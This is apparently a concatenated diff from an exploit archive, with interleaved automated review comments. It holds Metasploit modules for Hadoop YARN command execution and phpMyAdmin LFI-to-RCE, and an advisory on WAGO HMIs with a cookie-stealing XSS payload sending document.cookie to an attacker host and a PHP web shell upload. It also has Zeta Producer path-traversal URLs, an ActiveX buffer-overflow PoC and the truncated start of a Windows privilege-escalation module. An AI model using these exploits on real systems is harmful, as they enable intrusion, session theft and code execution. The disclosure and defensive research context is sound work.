This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.
},
'License' => MSF_LICENSE,
'Author' =>
[
'cbmixx', # Proof of concept
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
],
'References' =>
[
['URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
['URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
['Automatic', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 19 2016',
'DefaultTarget' => 0
))
register_options([Opt::RPORT(8088)])
end
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST'
)
rescue Rex::ConnectionError
vprint_error("#{peer} - Connection failed")
return CheckCode::Unknown
end
if res && res.code == 200 && res.body.include?('application-id')
return CheckCode::Detected
end
CheckCode::Safe
end
def exploit
print_status('Sending Command')
execute_cmdstager
end
def execute_command(cmd, opts = {})
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST'
)
app_id = res.get_json_document['application-id']
post = {
'application-id' => app_id,
'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
'application-type' => 'YARN',
'am-container-spec' => {
'commands' => {'command' => cmd.to_s}
}
}
send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
'method' => 'POST',
'ctype' => 'application/json',
'data' => post.to_json
)
end
end
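Review bot: execute_command (L857-L877) dereferences `res.get_json_document['application-id']` at L862 without checking that `res` is non-nil or that the request succeeded, so a ResourceManager that stops answering between check and exploit raises NoMethodError instead of a clean fail_with; guard it the way check does at L844-L850 and inspect the result of the submission POST at L871-L876 instead of discarding it. The Description at L813 also omits the precondition that makes the module applicable, a ResourceManager REST API reachable without authentication, which is exactly what the check method tests for at L848 (a POST to `/ws/v1/cluster/apps/new-application` answering 200 with an application-id and no credentials); stating it helps anyone triaging which clusters this applies to and which setting closes it.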

exploits/php/remote/45020.rb Executable file

@ -0,0 +1,234 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'phpMyAdmin Authenticated Remote Code Execution',
'Description' => %q{
phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion,
which can be exploited post-authentication to execute PHP code by
application. The module has been tested with phpMyAdmin v4.8.1.
},
'Author' =>
[
'ChaMd5', # Vulnerability discovery and PoC
'Henry Huang', # Vulnerability discovery and PoC
'Jacob Robles' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '104532' ],
[ 'CVE', '2018-12613' ],
[ 'CWE', '661' ],
[ 'URL', 'https://www.phpmyadmin.net/security/PMASA-2018-4/' ],
[ 'URL', 'https://www.secpulse.com/archives/72817.html' ],
[ 'URL', 'https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/' ]
],
'Privileged' => false,
'Platform' => [ 'php' ],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', {} ],
[ 'Windows', {} ],
[ 'Linux', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 19 2018'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
])
end
def check
begin
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
rescue
vprint_error("#{peer} - Unable to connect to server")
return Exploit::CheckCode::Unknown
end
if res.nil? || res.code != 200
vprint_error("#{peer} - Unable to query /js/messages.php")
return Exploit::CheckCode::Unknown
end
# v4.8.0 || 4.8.1 phpMyAdmin
if res.body =~ /PMA_VERSION:"(\d+\.\d+\.\d+)"/
version = Gem::Version.new($1)
vprint_status("#{peer} - phpMyAdmin version: #{version}")
if version == Gem::Version.new('4.8.0') || version == Gem::Version.new('4.8.1')
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Unknown
end
def query(uri, qstring, cookies, token)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'import.php'),
'cookie' => cookies,
'vars_post' => Hash[{
'sql_query' => qstring,
'db' => '',
'table' => '',
'token' => token
}.to_a.shuffle]
})
end
def lfi(uri, data_path, cookies, token)
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'encode_params' => false,
'vars_get' => {
'target' => "db_sql.php%253f#{'/..'*16}#{data_path}"
}
})
end
def exploit
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
end
uri = target_uri.path
vprint_status("#{peer} - Grabbing CSRF token...")
response = send_request_cgi({'uri' => uri})
if response.nil?
fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage grabbing CSRF token")
elsif response.body !~ /token"\s*value="(.*?)"/
fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?")
end
token = Rex::Text.html_decode($1)
if target.name =~ /Automatic/
/\((?<srv>Win.*)?\)/ =~ response.headers['Server']
mytarget = srv.nil? ? 'Linux' : 'Windows'
else
mytarget = target.name
end
vprint_status("#{peer} - Identified #{mytarget} target")
#Pull out the last two cookies
cookies = response.get_cookies
cookies = cookies.split[-2..-1].join(' ')
vprint_status("#{peer} - Retrieved token #{token}")
vprint_status("#{peer} - Retrieved cookies #{cookies}")
vprint_status("#{peer} - Authenticating...")
login = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'vars_post' => {
'token' => token,
'pma_username' => datastore['USERNAME'],
'pma_password' => datastore['PASSWORD']
}
})
if login.nil? || login.code != 302
fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage")
end
#Ignore the first cookie
cookies = login.get_cookies
cookies = cookies.split[1..-1].join(' ')
vprint_status("#{peer} - Retrieved cookies #{cookies}")
login_check = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' => { 'token' => token },
'cookie' => cookies
})
if login_check.nil?
fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage")
elsif login_check.body.include? 'Welcome to'
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
elsif login_check.body !~ /token"\s*value="(.*?)"/
fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?")
end
token = Rex::Text.html_decode($1)
vprint_status("#{peer} - Authentication successful")
#Generating strings/payload
database = rand_text_alpha_lower(5)
table = rand_text_alpha_lower(5)
column = rand_text_alpha_lower(5)
col_val = "'<?php eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\")); ?>'"
#Preparing sql queries
dbsql = "CREATE DATABASE #{database};"
tablesql = "CREATE TABLE #{database}.#{table}(#{column} varchar(4096) DEFAULT #{col_val});"
dropsql = "DROP DATABASE #{database};"
dirsql = 'SHOW VARIABLES WHERE Variable_Name Like "%datadir";'
#Create database
res = query(uri, dbsql, cookies, token)
if res.nil? || res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create database")
end
#Create table and column
res = query(uri, tablesql, cookies, token)
if res.nil? || res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create table")
end
#Find datadir
res = query(uri, dirsql, cookies, token)
if res.nil? || res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
end
unless res.body =~ /^<td data.*?>(.*)?</
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
end
#Creating include path
if mytarget == 'Windows'
#Table file location
data_path = $1.gsub(/\\/, '/')
data_path = data_path.sub(/^.*?\//, '/')
data_path << "#{database}/#{table}.frm"
else
#Session path location
/phpMyAdmin=(?<session_name>.*?);/ =~ cookies
data_path = "/var/lib/php/sessions/sess_#{session_name}"
end
res = lfi(uri, data_path, cookies, token)
#Drop database
res = query(uri, dropsql, cookies, token)
if res.nil? || res.code != 200
print_error("#{peer} - Failed to drop database #{database}. Might drop when your session closes.")
end
end
end
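Review bot: the error text at L942, "Unable to query /js/messages.php", does not match the request actually made at L936, which fetches target_uri.path; the message should name the URI that was requested. Three smaller points in exploit: the result of lfi at L1076 is assigned to res but never inspected, so a failed include is only noticed indirectly when no session comes back; the cookie handling at L1002 (`cookies.split[-2..-1]`) and L1021 (`cookies.split[1..-1]`) assumes the server sets cookies in a fixed order, which is brittle and deserves at least a comment; and the Linux session path at L1074 is hard-coded to /var/lib/php/sessions/, a Debian-family default, so it should be an option with that default and a note that other distributions place sessions elsewhere. The Description at L896-L898 is also cut mid-sentence ("to execute PHP code by application").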


@ -0,0 +1,325 @@
SEC Consult Vulnerability Lab Security Advisory < 20180711-0 >
=======================================================================
title: Remote code execution via multiple attack vectors
product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1
vulnerable version: FW 01 - 01.01.10(01)
fixed version: FW 02
CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981
impact: High
homepage: https://www.wago.com/
found: 2018-04-25
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"New ideas are the driving force behind our success WAGO is a family-owned
company headquartered in Minden, Germany. Independently operating for three
generations, WAGO is the global leader of spring pressure electrical
interconnect and automation solutions. For more than 60 years, WAGO has
developed and produced innovative products for packaging, transportation,
process, industrial and building automation markets amongst others. Aside from
its innovations in spring pressure connection technology, WAGO has introduced
numerous innovations that have revolutionized industry. Further ground-breaking
inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."
Source: http://www.wago.us/wago/
"For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY
7300T Web Panels help you reinforce the quality of your machinery and equipment
with a refined design and industry-leading software. Learn more about how the
right Web Panels make a difference.
HMI components are the finishing touch for machines or systems and they have an
overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing
HMIs that leave a lasting impression and significantly increase both the value
and image of your machine or system. WAGOs e!DISPLAY 7300T Web Panel is
available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes."
Source:
http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp
Business recommendation:
------------------------
HMI displays are widely used in SCADA infrastructures. The link between
their administrative (or informational) web interfaces and the users which
access these interfaces is critical. The presented attacks demonstrate how
simple it is to inject malicious code in order to break the security of this
link by exploiting minimal user interaction.
As a consequence a computer which is used for HMI administration should not
provide any possibility to get compromised via malicious script code.
One possible solution may be e.g.:
* Don't allow email clients
* Don't provide Internet access at all on the HMI stations
SEC Consult recommends to immediately apply the available patches from the vendor.
A thorough security review should be performed by security professionals to
identify further potential security issues.
Vulnerability overview/description:
-----------------------------------
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
Reflected cross site scripting vulnerabilities were identified within multiple PHP
scripts in the admin interface. The parameter JSON input which is sent to the
device is not sanitized sufficiently. An attacker can exploit this
vulnerability to execute arbitrary scripts in the context of the attacked user
and gain control over the active session.
This vulnerability is present for authenticated and unauthenticated users!
2) Stored Cross-Site Scripting (CVE-2018-12981)
A stored cross-site scripting vulnerability was identified within the
"PLC List" which can be configured in the web interface of the e!Display. By
storing a payload there, an administrative or guest user can be attacked
without tricking them to visit a malicious web site or clicking on an
malicious link.
This vulnerability is only present for authenticated users!
3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
Arbitrary files can be uploaded to the system without any check. It is even
possible to change the location of the uploaded file on the system. As the
web service does not run as privileged user, it is not possible to upload a
file directly to the web root but on many other locations on the file system.
The normal user 'user' and the administrative user 'admin' can both upload
files to the system.
4) Incorrect Default Permissions (CVE-2018-12979)
Due to incorrect default permissions a file in the web root can be overwritten
by the unprivileged 'www' user. This is the same user which is used in the
context of the web server.
5) Remote code execution via multiple attack vectors
By stacking vulnerability 1)/2), 3) and 4) with this vulnerability an outside
attacker can place a malicious script on the device in order to execute arbitrary
commands as 'www'. This can be done by uploading a web shell or a reverse
shell.
Proof of concept:
-----------------
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
The affected endpoints are:
http://<IP-Address>/wbm/configtools.php
http://<IP-Address>/wbm/login.php
http://<IP-Address>/wbm/receive_upload.php
The following request is an example for reflected XSS within 'configtools.php':
-------------------------------------------------------------------------------
POST /wbm/configtools.php HTTP/1.1
Host: <IP-Address>
Content-type: text/plain
[...]
{"sessionId":"","aDeviceParams":{"0":{"name":"firewall","parameter":["iptables","--get-xml"],"sudo":true,"multiline":true,"timeout":10000},"1":{"name":"firewall","parameter":["firewall","--is-enabled"],"sudo":true,"multiline":true,"timeout":10000,"dataId":"{DoNotParseAsXml}<img
src=x onerror=this.src='http://$attacker:8001/?c='+document.cookie>;"}}}
-------------------------------------------------------------------------------
Steal the cookie via XSS and send it to http://$attacker:8001?c=<Session-ID>:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://<IP-Address>/wbm/configtools.php" method="POST"
enctype="text/plain">
<input type="hidden"
name="&#123;"sessionId"&#58;""&#44;"aDeviceParams"&#58;&#123;"0"&#58;&#123;"name"&#58;"firewall"&#44;"parameter"&#58;&#91;"iptables"&#44;"&#45;&#45;get&#45;xml"&#93;&#44;"sudo"&#58;true&#44;"multiline"&#58;true&#44;"timeout"&#58;10000&#125;&#44;"1"&#58;&#123;"name"&#58;"firewall"&#44;"parameter"&#58;&#91;"firewall"&#44;"&#45;&#45;is&#45;enabled"&#93;&#44;"sudo"&#58;true&#44;"multiline"&#58;true&#44;"timeout"&#58;10000&#44;"dataId"&#58;"&#123;DoNotParseAsXml&#125;<img&#32;src"
value="x&#32;onerror&#61;this&#46;src&#61;&apos;http&#58;&#47;&#47;&#46;&#46;&#46;&#58;8001&#47;&#63;c&#61;&apos;&#43;document&#46;cookie>&#59;"&#125;&#125;&#125;"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
2) Stored Cross-Site Scripting (CVE-2018-12981)
To exploit this vulnerability malicious code has to be placed in the "PLC List"
by surfing to the endpoint http://<IP-Address>/app/index.html and clicking on
the tab "Application->PLC-List". By opening one of the configurable PLCs the
name can be changed in the box "Text:" in order to execute arbitrary script-
code. For example:
<img src=a onerror=alert('SEC_Consult_XSS');alert(document.cookie)>
The payload can also be placed on the device by using the following POST request:
-------------------------------------------------------------------------------
POST /wbm/configtools.php HTTP/1.1
Host: <IP-Address>
[...]
{"sessionId":"<Valid session-ID>
","aDeviceParams":{"0":{"name":"config_plcselect","parameter":[2,"url=https://127.0.0.1:8001","txt=<img
src=a
onerror=alert('SEC_Consult_XSS');alert(document.cookie)>","vkb=enabled","mon=1"],"sudo":true}}}
-------------------------------------------------------------------------------
3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
The file path, the file name and the file content can be manipulated in any
way. There is no server-side check for malicious files.
-------------------------------------------------------------------------------
POST /wbm/receive_upload.php HTTP/1.1
Host: <IP-Address>
[...]
Content-Type: multipart/form-data;
boundary=---------------------------728140389204955163192597293
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="touchWbm"
true
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="upload_type"
font
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="session_id"
<Valid session-ID>
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="upload_directory"
/tmp/
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="font_file"; filename="any_file.sh"
Content-Type: application/x-font-ttf
any-content #!
-----------------------------728140389204955163192597293--
-------------------------------------------------------------------------------
4) Incorrect Default Permissions (CVE-2018-12979)
The file 'index.html' is owned by 'www' and can therefore also be overwritten
with a web shell.
www@WAGO_eDisplay:/var/www ls -la
drwxr-xr-x 5 root root 488 XXX 99 2018 .
drwxr-xr-x 11 root root 824 XXX 99 2018 ..
lrwxrwxrwx 1 root root 16 XXX 99 2018 app -> /var/www/WagoWBM
-rw-r--r-- 1 www www 345 XXX 99 2018 index.html
drwxr-xr-x 7 root root 776 XXX 99 2018 plclist
drwxr-xr-x 3 root root 368 XXX 99 2018 WagoWBM
drwxr-xr-x 2 root root 688 XXX 99 2018 wbm
5) Remote code execution via multiple attack vectors
By uploading a simple PHP shell and overwriting the 'index.html' file located
under the web root an attacker can place a web shell which is reachable without
any authentication.
-------------------------------------------------------------------------------
POST /wbm/receive_upload.php HTTP/1.1
Host: <IP-Address>
[...]
Content-Type: multipart/form-data;
boundary=---------------------------728140389204955163192597293
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="touchWbm"
true
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="upload_type"
font
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="session_id"
<Valid session-ID>
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="upload_directory"
/var/www/
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="font_file"; filename="index.html"
Content-Type: application/x-font-ttf
<html><body>
<form method="GET" name="SEC Consult PoC" action="">
<input type="text" name="command"><input type="submit" value="Send"></form>
<pre><?php if($_GET['command']){system($_GET['command']);} ?></pre>
</body></html>
-----------------------------728140389204955163192597293--
-------------------------------------------------------------------------------
The shell can now be reached via "http://<IP-Address>/index.html". It is also
possible to upload a reverse-shell to the system which connects to a computer
outside of the actual network.
Vulnerable / tested versions:
-----------------------------
The following device with the firmware version has been tested:
* e!DISPLAY 7300T - WP 4.3 480x272 PIO1 - 01.01.10(01)
According to WAGO the following e!DISPLAY versions are vulnerable:
762-3000 FW 01
762-3001 FW 01
762-3002 FW 01
762-3003 FW 01
Vendor contact timeline:
------------------------
2018-04-30: Sending encrypted advisory to VDE CERT for coordination support
(info@cert.vde.com)
2018-05-02: Answer from VDE CERT that WAGO will be informed/contacted
2018-05-08: Status update from VDE CERT
2018-05-23: Asking for status update, no news from WAGO (via VDE CERT)
2018-06-08: VDE CERT: WAGO fixed the vulnerabilities and firmware is in
testing phase
2018-06-12: WAGO requested more time, postponing release date, asking for
affected & fixed versions
2018-06-13: VDE CERT will request CVE numbers
2018-06-17: WAGO scheduled the release for 2018-07-11
2018-06-26: VDE CERT sends WAGO advisory draft including affected/fixed versions
2018-07-04: VDE CERT sends final WAGO advisory incl. CVE numbers
2018-07-10: VDE CERT publishes security notice:
https://cert.vde.com/de-de/advisories/vde-2018-010
2018-07-11: SEC Consult advisory release
Solution:
---------
Update the device to the latest available firmware (FW 02). For further
information see the vendor's security notifications page:
https://www.wago.com/de/automatisierungstechnik/security (German)
Direct link to English WAGO advisory:
https://www.wago.com/medias/SA-WBM-2018-004.pdf?context=bWFzdGVyfHJvb3R8MjgyNzYwfGFwcGxpY2F0aW9uL3BkZnxoMWUvaDg4LzkzNjE3NTIxOTUxMDIucGRmfDU1NmJkYjEzNDY0ZGU4OWQ1OTMyMjUwNTlmZTI0MzgwNDQ1MDY1YzU3OWRmZDk1NzYzODAwMDI3ODg1NDJlZjU
Workaround:
-----------
Restrict network access to the device, don't allow Internet access from the
HMI station and do not install software from untrusted sources.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
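Review bot: the Workaround at L1330-L1333 is network-side only, but the findings themselves name host-side controls the advisory should list alongside it: the upload handler takes a client-supplied `upload_directory` (L1242-L1243) and file name (L1245) with no server-side check (L1224-L1225), and index.html is owned by www (L1257) although the web server runs as that user (L1167-L1168), so the fix checklist should include web-root files being owned by root and read-only for www, and the upload destination being fixed server-side rather than taken from the request. The reflected variant in 1) also works because configtools.php accepts a `Content-type: text/plain` body (L1185) that a cross-origin form with `enctype="text/plain"` (L1196) can submit, and it reflects the dataId value even with an empty sessionId (L1187); validating the content type and the session before echoing any part of the request closes the unauthenticated case noted at L1150.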


@ -0,0 +1,152 @@
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 >
=======================================================================
title: Remote Code Execution & Local File Disclosure
product: Zeta Producer Desktop CMS
vulnerable version: <=14.2.0
fixed version: >=14.2.1
CVE number: CVE-2018-13981, CVE-2018-13980
impact: critical
homepage: https://www.zeta-producer.com
found: 2017-11-25
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"With Zeta Producer, the website builder and online shop system for Windows,
you can create and manage your website locally, on your computer.
Get without expertise in 3 steps to your own homepage: select design,
paste content, publish website. Finished."
Source: https://www.zeta-producer.com/de/index.html
Business recommendation:
------------------------
The vendor provides a patched version which should be installed immediately.
Users of the product also need to verify that the affected widgets are updated in
the corresponding website project! It could be necessary to rebuild the whole project
or copy the new widgets to the website projects. For further information consult the
vendor.
Furthermore, an in-depth security analysis is highly advised, as the software may be
affected from further security issues.
Vulnerability overview/description:
-----------------------------------
1) Remote Code Execution (CVE-2018-13981)
The email contact functionality of the widget "formmailer" can upload files
to the server but if the user uploads a PHP script with a .php extension
then the server will rename it to .phps to prevent PHP code execution.
However, the attacker can upload .php5 or .phtml to the server without any
restriction. These alternative file extensions can be executed as PHP code.
Furthermore, the server will create a folder to store the files, with a
random name using PHP's "uniqid" function.
Unfortunately, if the server permits directory listing, the attacker
can easily browse to the uploaded PHP script. If no directory listing is
enabled the attacker can still bruteforce the random name to gain remote
code execution via the PHP script as well. Testing on a local server it
took about 20 seconds to brute force the random name. This attack will
be slower over the Internet but it is still feasible.
Also, if the user runs the Zeta Producer Desktop CMS GUI client locally,
they are also vulnerable because the web server will be running on TCP port 9153.
The root cause is in the widget "formmailer" which is enabled by default.
The following files are affected:
- /assets/php/formmailer/SendEmail.php
- /assets/php/formmailer/functions.php
2) Local File Disclosure (CVE-2018-13980)
If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an
unauthenticated attacker can read local files by exploiting path traversal issues.
The following files are affected:
- /assets/php/filebrowser/filebrowser.main.php
Proof of concept:
-----------------
1) Remote Code Execution (CVE-2018-13981)
The following python script can be used to exploit the chain of vulnerabilities.
[.. code has been removed to prevent misuses ..]
When the script is executed, a PHP script (shell) will be uploaded automatically.
# $ python exploit.py
# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php
#
# 5a1a5bc991afe
# 5a1a5bc99453a
# 10812
# [*] Found : http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
2) Local File Disclosure (CVE-2018-13980)
The parameter "file" in the "filebrowser.main.php" script can be exploited to read
arbitrary files from the OS with the privileges of the web server user.
Any unauthenticated user can exploit this issue!
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc&do=list
Vulnerable / tested versions:
-----------------------------
The following versions have been tested which were the latest version available
at the time of the test:
Zeta Producer Desktop CMS 14.1.0
Zeta Producer Desktop CMS 14.2.0
Source:
- https://www.zeta-producer.com/de/download.html
- https://github.com/ZetaSoftware/zeta-producer-content/
Vendor contact timeline:
------------------------
2017-11-29: Contacting vendor through info@zeta-producer.com and various other
email addresses from the website. No reply.
2017-12-13: Contacting vendor again, extending email address list, no reply
2018-01-09: Contacting vendor again
2018-01-10: Vendor replies, requests transmission of security advisory
2018-01-10: Sending unencrypted security advisory
2018-07-02: There was no feedback from the vendor but the version 14.2.1 fixed
the reported vulnerabilities.
2018-07-12: Public advisory release.
Solution:
---------
Upgrade to version 14.2.1 or newer. See the vendor's download page:
https://www.zeta-producer.com/de/download.html
Users of the product also need to verify that the affected widgets are updated in
the corresponding website project! It could be necessary to rebuild the whole project
or copy the new widgets to the website projects. For further information consult the
vendor.
Workaround:
-----------
Remove "formmailer" and "filebrowser" widgets.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
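Review bot: the fixed version at L1346 (>=14.2.1) rests on the tester's own re-test rather than vendor confirmation, since the timeline at L1437-L1438 records no vendor feedback; the Solution section should say so explicitly and, ideally, state what changed, because the root cause described at L1376-L1380 is an extension denylist (.php renamed to .phps while .php5 and .phtml pass) and a reader cannot tell whether 14.2.1 moved to an allowlist or only extended the list. The Business recommendation (L1367-L1370) and Solution (L1444-L1447) repeat the same four lines verbatim; one can point to the other. For 2), L1415-L1419 name the `file` parameter but not the expected fix, so a sentence that the script should canonicalize the path and confine it to the intended directory would give users something to verify besides removing the widget as L1450 advises.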


@ -0,0 +1,73 @@
<!--
=====[ Tempest Security Intelligence - ADV-24/2018 ]===
G DATA TOTAL SECURITY v25.4.0.3 Activex Buffer Overflow
Author: Filipe Xavier Oliveira
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents]=====================================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References
=====[ Overview]==============================================================
* System affected : G DATA TOTAL SECURITY [1].
* Software Version : 25.4.0.3 (other versions may also be affected).
* Impact : A user may be affected by opening a malicious black list
email in the antispam filter,
=====[ Detailed description]==================================================
The GDASPAMLib.AntiSpam ActiveX control ASK\GDASpam.dll in G DATA Total
Security 25.4.0.3 has a buffer overflow via a long IsBlackListed argument.
Through a long input in a member of class called Antispam, isblackedlist
class is vulnerable a buffer overflow.
A poc that causes a buffer overflow :
-->
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:B9D1548D-4339-485A-ABA2-F9F9C1CBF8AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\Program Files\G DATA\TotalSecurity\ASK\GDASpam.dll"
prototype = "Function IsBlackListed ( ByVal strIP As String ) As Long"
memberName = "IsBlackListed"
progid = "GDASPAMLib.AntiSpam"
argCount = 1
arg1=String(14356, "A")
target.IsBlackListed arg1
</script></job></package>
<!--
=====[ Timeline of disclosure]===============================================
04/10/2018 - Vulnerability reported.
04/17/2018 - The vendor will fix the vulnerability.
05/24/2017 - Vulnerability fixed.
07/12/2018 - CVE assigned [1]
=====[ Thanks & Acknowledgements]============================================
- Tempest Security Intelligence / Tempest's Pentest Team [3]
=====[ References]===========================================================
[1] https://www.gdatasoftware.com/
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10018
[3] http://www.tempest.com.br
=====[ EOF]====================================================================
-->
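Review bot: the Timeline at L1496-L1499 is internally inconsistent: "05/24/2017 - Vulnerability fixed." predates the report on 04/10/2018 and is presumably 2018, and "07/12/2018 - CVE assigned [1]" points at the vendor homepage while the CVE record is reference [2] (L1504). The Impact line at L1472-L1473 ends in a comma and reads as unfinished. In the script body, targetFile, prototype, memberName, progid and argCount (L1486-L1490) are assigned but never used, so a reader may assume they drive the call at L1492; either drop them or extend the comment at L1485 to say they are informational only.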

exploits/windows/local/45024.rb Executable file

@ -0,0 +1,174 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',
'Description' => %q{
This module exploits a vulnerability in a statement in the system programming guide
of the Intel 64 and IA-32 architectures software developer's manual being mishandled
in various operating system kerneles, resulting in unexpected behavior for #DB
excpetions that are deferred by MOV SS or POP SS.
This module will upload the pre-compiled exploit and use it to execute the final
payload in order to gain remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nick Peterson', # Original discovery (@nickeverdox)
'Nemanja Mulasmajic', # Original discovery (@0xNemi)
'Can Bölük <can1357>', # PoC
'bwatters-r7' # msf module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 08 2018',
'References' =>
[
['CVE', '2018-8897'],
['EDB', '44697'],
['BID', '104071'],
['URL', 'https://github.com/can1357/CVE-2018-8897/'],
['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'False'
}
))
register_options([
OptString.new('EXPLOIT_NAME',
[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
OptString.new('PAYLOAD_NAME',
[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
OptString.new('PATH',
[false, 'Path to write binaries (%TEMP% by default).', nil]),
OptInt.new('EXECUTE_DELAY',
[false, 'The number of seconds to delay before executing the exploit', 3])
])
end
def setup
super
@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
@payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
@exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
@payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i)
@temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
@payload_path = "#{temp_path}\\#{payload_name}"
